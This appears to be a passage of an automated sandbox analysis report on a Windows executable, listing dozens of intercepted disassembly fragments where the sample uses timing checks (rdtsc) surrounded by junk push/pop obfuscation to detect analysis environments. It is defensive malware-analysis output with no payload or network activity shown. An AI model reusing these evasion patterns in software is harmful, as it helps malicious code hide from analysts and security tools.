Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9C3B second address: BE9C83 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push ebx 0x00000013 push eax 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 nop 0x00000018 mov dword ptr [ebp+122D209Dh], edi 0x0000001e push 00000000h 0x00000020 pushad 0x00000021 sub dword ptr [ebp+122D1830h], esi 0x00000027 sub bh, 0000006Fh 0x0000002a popad 0x0000002b mov edx, dword ptr [ebp+122D1EC5h] 0x00000031 call 00007F1CC8B8C9E9h 0x00000036 push eax 0x00000037 push edx 0x00000038 jc 00007F1CC8B8C9ECh 0x0000003e jg 00007F1CC8B8C9E6h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9C83 second address: BE9CDB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C36h 0x00000012 jne 00007F1CC8BB7C36h 0x00000018 popad 0x00000019 pushad 0x0000001a jmp 00007F1CC8BB7C44h 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [esp+04h] 0x00000027 pushad 0x00000028 jnc 00007F1CC8BB7C3Ch 0x0000002e pushad 0x0000002f jmp 00007F1CC8BB7C3Dh 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9CDB second address: BE9D6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 je 00007F1CC8B8C9F3h 0x0000000e jmp 00007F1CC8B8C9EDh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push ecx 0x00000018 jng 00007F1CC8B8C9ECh 0x0000001e pop ecx 0x0000001f pop eax 0x00000020 jmp 00007F1CC8B8C9F7h 0x00000025 push 00000003h 0x00000027 movzx ecx, si 0x0000002a push 00000000h 0x0000002c cmc 0x0000002d mov ch, dl 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1CC8B8C9E8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b movzx edx, si 0x0000004e movzx edi, si 0x00000051 push 9A5FCAE0h 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F1CC8B8C9F6h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9D6E second address: BE9DBA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1CC8BB7C3Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 25A03520h 0x00000011 call 00007F1CC8BB7C3Fh 0x00000016 mov edi, ebx 0x00000018 pop esi 0x00000019 lea ebx, dword ptr [ebp+1244EB16h] 0x0000001f mov edx, dword ptr [ebp+122D2A8Fh] 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F1CC8BB7C44h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9DBA second address: BE9DBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9E27 second address: BE9E8B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov si, 4AA3h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007F1CC8BB7C38h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d push ebx 0x0000002e sub ecx, 4BBD619Bh 0x00000034 pop esi 0x00000035 xor cx, 5FDEh 0x0000003a call 00007F1CC8BB7C39h 0x0000003f push edx 0x00000040 pushad 0x00000041 pushad 0x00000042 popad 0x00000043 pushad 0x00000044 popad 0x00000045 popad 0x00000046 pop edx 0x00000047 push eax 0x00000048 push eax 0x00000049 push edx 0x0000004a push ecx 0x0000004b jmp 00007F1CC8BB7C3Eh 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9E8B second address: BE9EA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007F1CC8B8C9E6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9EBh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9EA8 second address: BE9F3B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jg 00007F1CC8BB7C36h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e push edi 0x0000000f je 00007F1CC8BB7C4Bh 0x00000015 jmp 00007F1CC8BB7C45h 0x0000001a pop edi 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f pushad 0x00000020 jmp 00007F1CC8BB7C40h 0x00000025 jmp 00007F1CC8BB7C3Bh 0x0000002a popad 0x0000002b pop eax 0x0000002c mov edi, dword ptr [ebp+122D2B0Fh] 0x00000032 push 00000003h 0x00000034 ja 00007F1CC8BB7C39h 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F1CC8BB7C38h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000017h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 stc 0x00000057 push 00000003h 0x00000059 mov ecx, dword ptr [ebp+122D2CBCh] 0x0000005f push C46FF89Ch 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9F3B second address: BE9F3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: BE9F3F second address: BE9F49 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C08222 second address: C0822A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C08374 second address: C0837A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C0837A second address: C0837E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C0837E second address: C08384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C08384 second address: C0838A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C0838A second address: C08394 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C084DC second address: C084F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F1CC8B8C9E6h 0x0000000d jmp 00007F1CC8B8C9F0h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C084F9 second address: C08507 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F1CC8BB7C3Eh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C087CD second address: C087D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C08CB9 second address: C08CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F1CC8BB7C3Eh 0x0000000a jne 00007F1CC8BB7C36h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe | RDTSC instruction interceptor: First address: C09223 second address: C09240 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F6h 0x00000007 push ebx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C09358 second address: C0935C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0935C second address: C09367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C096BB second address: C096C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D86E second address: C0D889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9F4h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D889 second address: C0D8A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C3Dh 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8A7 second address: C0D8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8AD second address: C0D8BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F1CC8BB7C3Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8BA second address: C0D8C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8C0 second address: C0D8C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0D8C8 second address: C0D8D2 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BD712A second address: BD713C instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BD713C second address: BD7140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0FF7D second address: C0FF81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C0FF81 second address: C0FF8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1051D second address: C10521 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10521 second address: C10527 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10527 second address: C10537 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Ch 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10537 second address: C1053B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1053B second address: C1054B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1054B second address: C10553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10553 second address: C10575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1CC8BB7C46h 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1062F second address: C1065E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F1CC8B8C9F7h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1065E second address: C10675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C10675 second address: C1068C instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1068C second address: C10690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: BDA825 second address: BDA832 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1571B second address: C15720 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C15720 second address: C15740 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F1CC8B8C9E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1CC8B8C9F2h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C159BB second address: C159C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C168CB second address: C168D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C16C8F second address: C16C93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C16C93 second address: C16C99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C175D5 second address: C175FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push ebx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ebx 0x0000000b popad 0x0000000c xchg eax, ebx 0x0000000d jmp 00007F1CC8BB7C40h 0x00000012 nop 0x00000013 js 00007F1CC8BB7C44h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C175FD second address: C17601 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17601 second address: C17622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1CC8BB7C48h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17622 second address: C1762C instructions: 0x00000000 rdtsc 0x00000002 jng 00007F1CC8B8C9ECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1797B second address: C17981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17BE3 second address: C17C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F1CC8B8C9ECh 0x0000000c jnp 00007F1CC8B8C9E6h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 jp 00007F1CC8B8C9ECh 0x0000001b pop eax 0x0000001c nop 0x0000001d mov esi, 2EC9228Ah 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 pop eax 0x00000028 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17C11 second address: C17C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push ecx 0x00000011 jmp 00007F1CC8BB7C43h 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C17C3F second address: C17C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C19165 second address: C19169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C19169 second address: C1917B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1CC8B8C9ECh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1A92F second address: C1A933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1CEE5 second address: C1CEE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1CEE9 second address: C1CF27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, 2809FB73h 0x00000012 push 00000000h 0x00000014 mov dword ptr [ebp+122D25D0h], eax 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D20DEh], edi 0x00000022 xchg eax, ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 push esi 0x00000026 jmp 00007F1CC8BB7C3Fh 0x0000002b pop esi 0x0000002c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1E4EB second address: C1E4EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1E4EF second address: C1E4F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2359F second address: C235AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F1CC8B8C9E6h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235AD second address: C235B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235B1 second address: C235BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235BD second address: C235C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C235C6 second address: C235CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245A1 second address: C245A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245A5 second address: C245AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C245AB second address: C245B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C256FC second address: C25735 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F1CC8B8C9F4h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F1CC8B8C9F9h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C25735 second address: C25739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C24728 second address: C24749 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnl 00007F1CC8B8C9E6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F1CC8B8C9F2h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2789B second address: C2789F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
